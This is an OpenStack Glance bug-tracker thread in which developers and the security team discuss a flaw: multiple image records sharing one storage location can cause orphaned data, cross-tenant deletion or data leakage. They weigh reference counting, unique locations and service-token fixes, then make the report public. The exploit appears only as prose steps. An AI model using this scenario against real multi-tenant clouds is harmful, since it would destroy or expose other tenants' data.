Please read through as soon as you can and leave comments here. I think I addressed all the issues, but I may have left something out. Or possibly this is over-complicating things. In any case, let me know what you think. Thanks!

I've been thinking about Cinder. I think the scheme proposed in the spec is vulnerable to the following exploit when Cinder is being used in multi-tenant mode:

1 Tenant A creates Image 1234 with location cinder://whatever (and Tenant A owns this data)
2 Tenant B creates Image 2222 with location cinder://whatever
3 Tenant A deletes Image 1234. Glance doesn't try to delete cinder://whatever because the location_count is non-zero
4 (Tenant A is now paying for storage of image data he's "deleted", but we'll ignore that.)
5 Tenant B deletes Image 2222. The location_counter for cinder://whatever is now zero, so Glance tries to delete cinder://whatever. This will fail because Tenant B does not own cinder://whatever, so cinder will not allow the volume to be deleted.

As a result, the scheme in the spec is vulnerable to leaving around a lot of "dark data".

My conclusion is that I'm beginning to think that we've gone overboard with this reference counting business, and that we should simply disallow multiple images using the same location. Those "legitimate scenarios" for multiple Glance image records referring to the same location resolve around the autoscale case, and nowadays autoscale is falling out of favor and people are using containers instead.

I think we should simplify the proposal. We'll still need to normalize the locations URIs for some of the backends, and we'll need to do the hashing to allow for quick lookups/uniqueness on the location, but maybe we can do that by adding an indexed column to the 'image_locations' table. Maybe we can get away with not having the to_be_deleted table, too?

John Garbutt (johngarbutt) wrote :

Wondering if we can use the new service token system to secure this quickly. Only allow requests with a Cinder and Nova service token attached to create images with RBD locations, due to implied delete permission. In a similar way, we could hide the location URL to all list/show images that don't have the service token.

I think it's good to also not allow duplicate image locations. Snapshots are cheap in ceph, as I understand it, so the system should always create another snapshot. But that seems less of a sercurity thing, more a robustness thing.

Now I am sure there are better fixes, but that service token policy fix seems a quick-ish fix to me? I could be wrong.

PS
Why were users wanting to create snapshots from ceph urls, admin only thing really?

PPS
Doesn't your spec fail to protect from people guessing / knowning a random users disk and just deleting it? I might have missread it.

Thanks, John.

Everyone: let's consider John's suggestion carefully. I was going to hold off on the service token stuff for later in the interest of getting a fix to this bug out, but obviously the proposal on the spec is so freaking complicated that complexity of the fix is no longer an issue.

@John: your PS: the problem is small deployments with only one Glance requires exposing setting the locations, so even though it should be admin only, it's open to users. Your service-token proposal would address this.

@John: your PPS: the original user's image would keep the reference count for the data at > 0, so even if someone guessed/learned the location, set it on an image, and deleted the image, Glance wouldn't try to delete the data out of the backend. On the other hand, this is a data leakage scenario that I don't like, and I think we should prevent it. So that's another reason to prohibit multiple image records from containing the same location.

Feilong Wang (flwang) wrote :

One thing I want to do since long time ago is saving the image owner in the location's metadata so that only the owner has the permission to delete the image(data). Does that make sense?

Feilong Wang (flwang) wrote :

@John, Re the 'service token' idea, does that mean we need additional work for Nova and Cinder, or they have already supported this? Thanks.

@Fei Long: if we put the image owner in the location metadata, then we'll need to have some concept of "system location metadata" so that a user can't modify the owner. I think I'd prefer to make image locations unique so that only one image record can have a particular location. Then we wouldn't need the owner metadata, because the image owner would also own that location.

Key question: is there a solid use-case requiring multiple images to refer to the same image data location? (There are a few mentioned in the spec, but I don't see them as being use cases that absolutely *must* be satisfied, I think we would be OK disallowing them.)

Note: I just subscribed Hemanth to this bug. He was subscribed earlier as a member of glance coresec, so this doesn't open up the bug to a wider audience in any way. This is on the off chance he has time to look over the spec. He's the expert on zero-downtime-database migrations, so it would be nice to have his input on the database changes.

Erno Kuvaja (jokke) wrote :

So the problem with trying to solve this by just preventing creation is that it fixes the issue only partially. All the images that might have this situation already in hands (People creating image based on public image's location to have their own metadata associated with it) are still vulnerable as soon as any of these images with multiple same location is deleted. In other words the creation time fix is not a solution for any existing cases where the reference counting would be.

Now if I have understood correctly one cannot remove snapshotted image from rdb backends, which makes this bug not disappear but be bit less hazardous. I will try to test that next week.

I've subscribed the OSSN group to discuss a potential Security Note regarding this bug and bug 1555590 which are both affected by the show_multiple_location feature when it is available to regular user. This is similar to the OSSN-0065 but it seems like a new Note titled "Show Multiple Location shouldn't be exposed to regular user" (or something along those lines) would be better suited.

Some points of information:

You can see that the show_multiple_locations option is described as a security risk in both the configuration file and in the API reference guide in all stable branches:
https://github.com/openstack/glance/blob/stable/newton/etc/glance-api.conf#L305-L308
https://github.com/openstack/glance/blob/stable/newton/api-ref/source/v2/images-parameters.yaml#L373-L385

The option was scheduled to be removed in Ocata, but we decided to leave it in because it's mentioned in OSSN-0065 as a way to be sure you're not subject to the vulnerability:
https://github.com/openstack/glance/commit/bd5a23df095af9f2d5b21f3350674fb6e36abbe5

Matthew Oliver (matt-0) wrote :

Sorry, I've been rather distracted, I was involved in the Rackspace layoffs last year, but am now onboard with Suse, and this somehow fell through the cracks. Where is this at, it's now 2018.

As for an earlier comment about Swift SLO segments. The swift-store saves segments as:

  "%s-%05d" % (location.obj, chunk_id)

Where the location.obj is the image_id. So segments also contain the image_id, so from my understanding of the patch, these segments also can't be used.

Maybe something to talk about at the PTG?

Jeremy Stanley (fungi) wrote :

Sorry about that. The OpenStack VMT has considered it closed from our perspective since Tristan switched the security advisory task to Opinion over two years ago (comment #39). It looks like the OSSN editors probably never noticed Tristan's suggestion nearly a year ago (comment #133) either, so I've subscribed the ossg-coresec reviewers as well.

I recommend we switch this report to a normal Public bug this Friday, August 10, unless there are objections in the meantime. As a community we shouldn't be keeping bug reports private for more than a month (my opinion), so 2.5 years is beyond excessive.

Erno Kuvaja (jokke) wrote :

Thanks Jeremy,

I totally agree. I'm not even sure to what extent this is still an issue/exploitable. Perhaps at this stage it would be good to open up and get the work going to fix what still needs to be fixed.

Jeremy Stanley (fungi) wrote :

Seeing no objections, I'm switching this to Public status (long overdue!).

information type: Private Security → Public
tags: added: security
Changed in ossa:
importance: Critical → Undecided
Matthew Oliver (matt-0) wrote :

Great thanks Jeremy.

So that's a good question, what is the state of this bug. There was some patches added to the bug while embargoed, but then there was discussion about the reference counting approach. So what's the plan here?

Can we confirm this is still an issue? Glance devs?

Jeremy Stanley (fungi) on 2019-08-29
description: updated
Displaying first 40 and last 40 comments. View all 139 comments or add a comment.